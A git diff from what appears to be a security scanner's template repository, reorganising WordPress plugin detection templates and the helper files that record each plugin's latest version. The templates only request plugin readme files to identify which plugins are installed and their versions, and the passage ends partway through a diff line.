helpers/wordpress/plugins/woocommerce-services.txt diff --git a/helpers/wordpress/plugins/woocommerce.txt b/helpers/wordpress/plugins/woocommerce.txt new file mode 100644 index 0000000000..4b49d9bb63 --- /dev/null +++ b/helpers/wordpress/plugins/woocommerce.txt @@ -0,0 +1 @@ +7.2.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woosidebars.txt b/helpers/wordpress/plugins/woosidebars.txt similarity index 100% rename from technologies/wordpress/wordpress-woosidebars.txt rename to helpers/wordpress/plugins/woosidebars.txt diff --git a/helpers/wordpress/plugins/wordfence.txt b/helpers/wordpress/plugins/wordfence.txt new file mode 100644 index 0000000000..a33192706f --- /dev/null +++ b/helpers/wordpress/plugins/wordfence.txt @@ -0,0 +1 @@ +7.8.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wordpress-importer.txt b/helpers/wordpress/plugins/wordpress-importer.txt similarity index 100% rename from technologies/wordpress/wordpress-wordpress-importer.txt rename to helpers/wordpress/plugins/wordpress-importer.txt diff --git a/helpers/wordpress/plugins/wordpress-seo.txt b/helpers/wordpress/plugins/wordpress-seo.txt new file mode 100644 index 0000000000..7350bc1da0 --- /dev/null +++ b/helpers/wordpress/plugins/wordpress-seo.txt @@ -0,0 +1 @@ +19.12 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-worker.txt b/helpers/wordpress/plugins/worker.txt similarity index 100% rename from technologies/wordpress/wordpress-worker.txt rename to helpers/wordpress/plugins/worker.txt diff --git a/helpers/wordpress/plugins/wp-fastest-cache.txt b/helpers/wordpress/plugins/wp-fastest-cache.txt new file mode 100644 index 0000000000..e5a4a5e7d8 --- /dev/null +++ b/helpers/wordpress/plugins/wp-fastest-cache.txt @@ -0,0 +1 @@ +1.0.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-file-manager.txt b/helpers/wordpress/plugins/wp-file-manager.txt new file mode 100644 index 0000000000..c92484044e --- /dev/null +++ b/helpers/wordpress/plugins/wp-file-manager.txt @@ -0,0 +1 @@ +7.1.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-google-maps.txt b/helpers/wordpress/plugins/wp-google-maps.txt new file mode 100644 index 0000000000..5623d118b3 --- /dev/null +++ b/helpers/wordpress/plugins/wp-google-maps.txt @@ -0,0 +1 @@ +9.0.14 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-mail-smtp.txt b/helpers/wordpress/plugins/wp-mail-smtp.txt new file mode 100644 index 0000000000..240bba9069 --- /dev/null +++ b/helpers/wordpress/plugins/wp-mail-smtp.txt @@ -0,0 +1 @@ +3.7.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-maintenance-mode.txt b/helpers/wordpress/plugins/wp-maintenance-mode.txt new file mode 100644 index 0000000000..d5724cd41b --- /dev/null +++ b/helpers/wordpress/plugins/wp-maintenance-mode.txt @@ -0,0 +1 @@ +2.6.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-migrate-db.txt b/helpers/wordpress/plugins/wp-migrate-db.txt similarity index 100% rename from technologies/wordpress/wordpress-wp-migrate-db.txt rename to helpers/wordpress/plugins/wp-migrate-db.txt diff --git a/technologies/wordpress/wordpress-wp-multibyte-patch.txt b/helpers/wordpress/plugins/wp-multibyte-patch.txt similarity index 100% rename from technologies/wordpress/wordpress-wp-multibyte-patch.txt rename to helpers/wordpress/plugins/wp-multibyte-patch.txt diff --git a/helpers/wordpress/plugins/wp-optimize.txt b/helpers/wordpress/plugins/wp-optimize.txt new file mode 100644 index 0000000000..d6bb32f36f --- /dev/null +++ b/helpers/wordpress/plugins/wp-optimize.txt @@ -0,0 +1 @@ +3.2.10 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wp-pagenavi.txt b/helpers/wordpress/plugins/wp-pagenavi.txt similarity index 100% rename from technologies/wordpress/wordpress-wp-pagenavi.txt rename to helpers/wordpress/plugins/wp-pagenavi.txt diff --git a/technologies/wordpress/wordpress-wp-reset.txt b/helpers/wordpress/plugins/wp-reset.txt similarity index 100% rename from technologies/wordpress/wordpress-wp-reset.txt rename to helpers/wordpress/plugins/wp-reset.txt diff --git a/technologies/wordpress/wordpress-wp-sitemap-page.txt b/helpers/wordpress/plugins/wp-sitemap-page.txt similarity index 100% rename from technologies/wordpress/wordpress-wp-sitemap-page.txt rename to helpers/wordpress/plugins/wp-sitemap-page.txt diff --git a/technologies/wordpress/wordpress-wp-smushit.txt b/helpers/wordpress/plugins/wp-smushit.txt similarity index 100% rename from technologies/wordpress/wordpress-wp-smushit.txt rename to helpers/wordpress/plugins/wp-smushit.txt diff --git a/technologies/wordpress/wordpress-wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt similarity index 100% rename from technologies/wordpress/wordpress-wp-statistics.txt rename to helpers/wordpress/plugins/wp-statistics.txt diff --git a/helpers/wordpress/plugins/wp-super-cache.txt b/helpers/wordpress/plugins/wp-super-cache.txt new file mode 100644 index 0000000000..6f2d3653d5 --- /dev/null +++ b/helpers/wordpress/plugins/wp-super-cache.txt @@ -0,0 +1 @@ +1.9.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt new file mode 100644 index 0000000000..4f3470c166 --- /dev/null +++ b/helpers/wordpress/plugins/wp-user-avatar.txt @@ -0,0 +1 @@ +4.4.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wpcf7-recaptcha.txt b/helpers/wordpress/plugins/wpcf7-recaptcha.txt similarity index 100% rename from technologies/wordpress/wordpress-wpcf7-recaptcha.txt rename to helpers/wordpress/plugins/wpcf7-recaptcha.txt diff --git a/technologies/wordpress/wordpress-wpcf7-redirect.txt b/helpers/wordpress/plugins/wpcf7-redirect.txt similarity index 100% rename from technologies/wordpress/wordpress-wpcf7-redirect.txt rename to helpers/wordpress/plugins/wpcf7-redirect.txt diff --git a/technologies/wordpress/wordpress-wpforms-lite.txt b/helpers/wordpress/plugins/wpforms-lite.txt similarity index 100% rename from technologies/wordpress/wordpress-wpforms-lite.txt rename to helpers/wordpress/plugins/wpforms-lite.txt diff --git a/technologies/wordpress/wordpress-wps-hide-login.txt b/helpers/wordpress/plugins/wps-hide-login.txt similarity index 100% rename from technologies/wordpress/wordpress-wps-hide-login.txt rename to helpers/wordpress/plugins/wps-hide-login.txt diff --git a/helpers/wordpress/plugins/yith-woocommerce-compare.txt b/helpers/wordpress/plugins/yith-woocommerce-compare.txt new file mode 100644 index 0000000000..971e119ac7 --- /dev/null +++ b/helpers/wordpress/plugins/yith-woocommerce-compare.txt @@ -0,0 +1 @@ +2.21.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-yith-woocommerce-wishlist.txt b/helpers/wordpress/plugins/yith-woocommerce-wishlist.txt similarity index 100% rename from technologies/wordpress/wordpress-yith-woocommerce-wishlist.txt rename to helpers/wordpress/plugins/yith-woocommerce-wishlist.txt diff --git a/technologies/wordpress/wordpress-ad-inserter.yaml b/technologies/wordpress/plugins/ad-inserter.yaml similarity index 86% rename from technologies/wordpress/wordpress-ad-inserter.yaml rename to technologies/wordpress/plugins/ad-inserter.yaml index 3a23dc3176..761e645af8 100644 --- a/technologies/wordpress/wordpress-ad-inserter.yaml +++ b/technologies/wordpress/plugins/ad-inserter.yaml @@ -1,7 +1,7 @@ id: wordpress-ad-inserter info: - name: "Ad Inserter – Ad Manager & AdSense Ads Detection" + name: Ad Inserter – Ad Manager & AdSense Ads Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/ad-inserter/readme.txt" payloads: - last_version: wordpress-ad-inserter.txt + last_version: helpers/wordpress/plugins/ad-inserter.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-add-to-any.yaml b/technologies/wordpress/plugins/add-to-any.yaml similarity index 87% rename from technologies/wordpress/wordpress-add-to-any.yaml rename to technologies/wordpress/plugins/add-to-any.yaml index 2fbfdf7652..c7d4ddd798 100644 --- a/technologies/wordpress/wordpress-add-to-any.yaml +++ b/technologies/wordpress/plugins/add-to-any.yaml @@ -1,7 +1,7 @@ id: wordpress-add-to-any info: - name: "AddToAny Share Buttons Detection" + name: AddToAny Share Buttons Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/add-to-any/readme.txt" payloads: - last_version: wordpress-add-to-any.txt + last_version: helpers/wordpress/plugins/add-to-any.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-admin-menu-editor.yaml b/technologies/wordpress/plugins/admin-menu-editor.yaml similarity index 87% rename from technologies/wordpress/wordpress-admin-menu-editor.yaml rename to technologies/wordpress/plugins/admin-menu-editor.yaml index 643dc6f239..49de6bb341 100644 --- a/technologies/wordpress/wordpress-admin-menu-editor.yaml +++ b/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -1,7 +1,7 @@ id: wordpress-admin-menu-editor info: - name: "Admin Menu Editor Detection" + name: Admin Menu Editor Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/admin-menu-editor/readme.txt" payloads: - last_version: wordpress-admin-menu-editor.txt + last_version: helpers/wordpress/plugins/admin-menu-editor.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-adminimize.yaml b/technologies/wordpress/plugins/adminimize.yaml similarity index 88% rename from technologies/wordpress/wordpress-adminimize.yaml rename to technologies/wordpress/plugins/adminimize.yaml index 9ccbe577bb..39d1e29582 100644 --- a/technologies/wordpress/wordpress-adminimize.yaml +++ b/technologies/wordpress/plugins/adminimize.yaml @@ -1,7 +1,7 @@ id: wordpress-adminimize info: - name: "Adminimize Detection" + name: Adminimize Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: adminimize wpscan: https://wpscan.com/plugin/adminimize - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/adminimize/readme.txt" payloads: - last_version: wordpress-adminimize.txt + last_version: helpers/wordpress/plugins/adminimize.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-advanced-custom-fields.yaml b/technologies/wordpress/plugins/advanced-custom-fields.yaml similarity index 86% rename from technologies/wordpress/wordpress-advanced-custom-fields.yaml rename to technologies/wordpress/plugins/advanced-custom-fields.yaml index 083d9c8d16..fe729ad25f 100644 --- a/technologies/wordpress/wordpress-advanced-custom-fields.yaml +++ b/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -1,7 +1,7 @@ id: wordpress-advanced-custom-fields info: - name: "Advanced Custom Fields Detection" + name: Advanced Custom Fields Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt" payloads: - last_version: wordpress-advanced-custom-fields.txt + last_version: helpers/wordpress/plugins/advanced-custom-fields.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-akismet.yaml b/technologies/wordpress/plugins/akismet.yaml similarity index 86% rename from technologies/wordpress/wordpress-akismet.yaml rename to technologies/wordpress/plugins/akismet.yaml index c6a9fac1bd..381d1d72c0 100644 --- a/technologies/wordpress/wordpress-akismet.yaml +++ b/technologies/wordpress/plugins/akismet.yaml @@ -1,7 +1,7 @@ id: wordpress-akismet info: - name: "Akismet Spam Protection Detection" + name: Akismet Spam Protection Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/akismet/readme.txt" payloads: - last_version: wordpress-akismet.txt + last_version: helpers/wordpress/plugins/akismet.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml b/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml similarity index 84% rename from technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml rename to technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 97b4c25c37..e44e73c39e 100644 --- a/technologies/wordpress/wordpress-all-404-redirect-to-homepage.yaml +++ b/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -1,7 +1,7 @@ id: wordpress-all-404-redirect-to-homepage info: - name: "All 404 Redirect to Homepage & Broken images Redirection Detection" + name: All 404 Redirect to Homepage & Broken images Redirection Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt" payloads: - last_version: wordpress-all-404-redirect-to-homepage.txt + last_version: helpers/wordpress/plugins/all-404-redirect-to-homepage.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml b/technologies/wordpress/plugins/all-in-one-seo-pack.yaml similarity index 81% rename from technologies/wordpress/wordpress-all-in-one-seo-pack.yaml rename to technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 919bd3ccb6..52aa5d23a3 100644 --- a/technologies/wordpress/wordpress-all-in-one-seo-pack.yaml +++ b/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -1,7 +1,7 @@ id: wordpress-all-in-one-seo-pack info: - name: "All in One SEO – Best WordPress SEO Plugin – Easily Improve SEO Rankings & Increase Traffic Detection" + name: All in One SEO – Best WordPress SEO Plugin – Easily Improve SEO Rankings & Increase Traffic Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt" payloads: - last_version: wordpress-all-in-one-seo-pack.txt + last_version: helpers/wordpress/plugins/all-in-one-seo-pack.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml b/technologies/wordpress/plugins/all-in-one-wp-migration.yaml similarity index 86% rename from technologies/wordpress/wordpress-all-in-one-wp-migration.yaml rename to technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 0fbac4b4c3..120a1f8da3 100644 --- a/technologies/wordpress/wordpress-all-in-one-wp-migration.yaml +++ b/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -1,7 +1,7 @@ id: wordpress-all-in-one-wp-migration info: - name: "All-in-One WP Migration Detection" + name: All-in-One WP Migration Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" payloads: - last_version: wordpress-all-in-one-wp-migration.txt + last_version: helpers/wordpress/plugins/all-in-one-wp-migration.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml b/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml similarity index 84% rename from technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml rename to technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 0c66d581e2..02be08ba6c 100644 --- a/technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.yaml +++ b/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -1,7 +1,7 @@ id: wordpress-all-in-one-wp-security-and-firewall info: - name: "All-In-One Security (AIOS) – Security and Firewall Detection" + name: All-In-One Security (AIOS) – Security and Firewall Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt" payloads: - last_version: wordpress-all-in-one-wp-security-and-firewall.txt + last_version: helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-amp.yaml b/technologies/wordpress/plugins/amp.yaml similarity index 89% rename from technologies/wordpress/wordpress-amp.yaml rename to technologies/wordpress/plugins/amp.yaml index 72a216a56c..45d7d4fbac 100644 --- a/technologies/wordpress/wordpress-amp.yaml +++ b/technologies/wordpress/plugins/amp.yaml @@ -1,7 +1,7 @@ id: wordpress-amp info: - name: "AMP Detection" + name: AMP Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/amp/readme.txt" payloads: - last_version: wordpress-amp.txt + last_version: helpers/wordpress/plugins/amp.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-antispam-bee.yaml b/technologies/wordpress/plugins/antispam-bee.yaml similarity index 87% rename from technologies/wordpress/wordpress-antispam-bee.yaml rename to technologies/wordpress/plugins/antispam-bee.yaml index 22a782ab51..ceb0510597 100644 --- a/technologies/wordpress/wordpress-antispam-bee.yaml +++ b/technologies/wordpress/plugins/antispam-bee.yaml @@ -1,7 +1,7 @@ id: wordpress-antispam-bee info: - name: "Antispam Bee Detection" + name: Antispam Bee Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/antispam-bee/readme.txt" payloads: - last_version: wordpress-antispam-bee.txt + last_version: helpers/wordpress/plugins/antispam-bee.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-astra-sites.yaml b/technologies/wordpress/plugins/astra-sites.yaml similarity index 83% rename from technologies/wordpress/wordpress-astra-sites.yaml rename to technologies/wordpress/plugins/astra-sites.yaml index 6ea71f8176..1b7522de7b 100644 --- a/technologies/wordpress/wordpress-astra-sites.yaml +++ b/technologies/wordpress/plugins/astra-sites.yaml @@ -1,7 +1,7 @@ id: wordpress-astra-sites info: - name: "Starter Templates — Elementor, WordPress & Beaver Builder Templates Detection" + name: Starter Templates — Elementor, WordPress & Beaver Builder Templates Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/astra-sites/readme.txt" payloads: - last_version: wordpress-astra-sites.txt + last_version: helpers/wordpress/plugins/astra-sites.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-astra-widgets.yaml b/technologies/wordpress/plugins/astra-widgets.yaml similarity index 88% rename from technologies/wordpress/wordpress-astra-widgets.yaml rename to technologies/wordpress/plugins/astra-widgets.yaml index 35aeedd890..94de2b1d9e 100644 --- a/technologies/wordpress/wordpress-astra-widgets.yaml +++ b/technologies/wordpress/plugins/astra-widgets.yaml @@ -1,7 +1,7 @@ id: wordpress-astra-widgets info: - name: "Astra Widgets Detection" + name: Astra Widgets Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/astra-widgets/readme.txt" payloads: - last_version: wordpress-astra-widgets.txt + last_version: helpers/wordpress/plugins/astra-widgets.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-autoptimize.yaml b/technologies/wordpress/plugins/autoptimize.yaml similarity index 87% rename from technologies/wordpress/wordpress-autoptimize.yaml rename to technologies/wordpress/plugins/autoptimize.yaml index 03306aa8c7..5145e3382e 100644 --- a/technologies/wordpress/wordpress-autoptimize.yaml +++ b/technologies/wordpress/plugins/autoptimize.yaml @@ -1,7 +1,7 @@ id: wordpress-autoptimize info: - name: "Autoptimize Detection" + name: Autoptimize Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/autoptimize/readme.txt" payloads: - last_version: wordpress-autoptimize.txt + last_version: helpers/wordpress/plugins/autoptimize.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-backwpup.yaml b/technologies/wordpress/plugins/backwpup.yaml similarity index 85% rename from technologies/wordpress/wordpress-backwpup.yaml rename to technologies/wordpress/plugins/backwpup.yaml index acd3928501..e7f585c9f9 100644 --- a/technologies/wordpress/wordpress-backwpup.yaml +++ b/technologies/wordpress/plugins/backwpup.yaml @@ -1,7 +1,7 @@ id: wordpress-backwpup info: - name: "BackWPup – WordPress Backup Plugin Detection" + name: BackWPup – WordPress Backup Plugin Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/backwpup/readme.txt" payloads: - last_version: wordpress-backwpup.txt + last_version: helpers/wordpress/plugins/backwpup.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-better-search-replace.yaml b/technologies/wordpress/plugins/better-search-replace.yaml similarity index 86% rename from technologies/wordpress/wordpress-better-search-replace.yaml rename to technologies/wordpress/plugins/better-search-replace.yaml index 68db0100f7..9bf4e2e827 100644 --- a/technologies/wordpress/wordpress-better-search-replace.yaml +++ b/technologies/wordpress/plugins/better-search-replace.yaml @@ -1,7 +1,7 @@ id: wordpress-better-search-replace info: - name: "Better Search Replace Detection" + name: Better Search Replace Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/better-search-replace/readme.txt" payloads: - last_version: wordpress-better-search-replace.txt + last_version: helpers/wordpress/plugins/better-search-replace.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-better-wp-security.yaml b/technologies/wordpress/plugins/better-wp-security.yaml similarity index 87% rename from technologies/wordpress/wordpress-better-wp-security.yaml rename to technologies/wordpress/plugins/better-wp-security.yaml index 3d5e7463d8..36b945705b 100644 --- a/technologies/wordpress/wordpress-better-wp-security.yaml +++ b/technologies/wordpress/plugins/better-wp-security.yaml @@ -1,7 +1,7 @@ id: wordpress-better-wp-security info: - name: "iThemes Security Detection" + name: iThemes Security Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/better-wp-security/readme.txt" payloads: - last_version: wordpress-better-wp-security.txt + last_version: helpers/wordpress/plugins/better-wp-security.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml b/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml similarity index 86% rename from technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml rename to technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index da7a093bc8..ca1f5b4b0a 100644 --- a/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml +++ b/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -1,7 +1,7 @@ id: wordpress-black-studio-tinymce-widget info: - name: "Black Studio TinyMCE Widget Detection" + name: Black Studio TinyMCE Widget Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/black-studio-tinymce-widget/readme.txt" payloads: - last_version: wordpress-black-studio-tinymce-widget.txt + last_version: helpers/wordpress/plugins/black-studio-tinymce-widget.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-breadcrumb-navxt.yaml b/technologies/wordpress/plugins/breadcrumb-navxt.yaml similarity index 87% rename from technologies/wordpress/wordpress-breadcrumb-navxt.yaml rename to technologies/wordpress/plugins/breadcrumb-navxt.yaml index 8957d3f2f2..eba748064c 100644 --- a/technologies/wordpress/wordpress-breadcrumb-navxt.yaml +++ b/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -1,7 +1,7 @@ id: wordpress-breadcrumb-navxt info: - name: "Breadcrumb NavXT Detection" + name: Breadcrumb NavXT Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/readme.txt" payloads: - last_version: wordpress-breadcrumb-navxt.txt + last_version: helpers/wordpress/plugins/breadcrumb-navxt.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-broken-link-checker.yaml b/technologies/wordpress/plugins/broken-link-checker.yaml similarity index 86% rename from technologies/wordpress/wordpress-broken-link-checker.yaml rename to technologies/wordpress/plugins/broken-link-checker.yaml index 7969fa6dcf..ca02f508a1 100644 --- a/technologies/wordpress/wordpress-broken-link-checker.yaml +++ b/technologies/wordpress/plugins/broken-link-checker.yaml @@ -1,7 +1,7 @@ id: wordpress-broken-link-checker info: - name: "Broken Link Checker Detection" + name: Broken Link Checker Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/broken-link-checker/readme.txt" payloads: - last_version: wordpress-broken-link-checker.txt + last_version: helpers/wordpress/plugins/broken-link-checker.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-child-theme-configurator.yaml b/technologies/wordpress/plugins/child-theme-configurator.yaml similarity index 87% rename from technologies/wordpress/wordpress-child-theme-configurator.yaml rename to technologies/wordpress/plugins/child-theme-configurator.yaml index ee214cd855..23410b491b 100644 --- a/technologies/wordpress/wordpress-child-theme-configurator.yaml +++ b/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -1,7 +1,7 @@ id: wordpress-child-theme-configurator info: - name: "Child Theme Configurator Detection" + name: Child Theme Configurator Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/child-theme-configurator/readme.txt" payloads: - last_version: wordpress-child-theme-configurator.txt + last_version: helpers/wordpress/plugins/child-theme-configurator.txt extractors: - type: regex diff --git 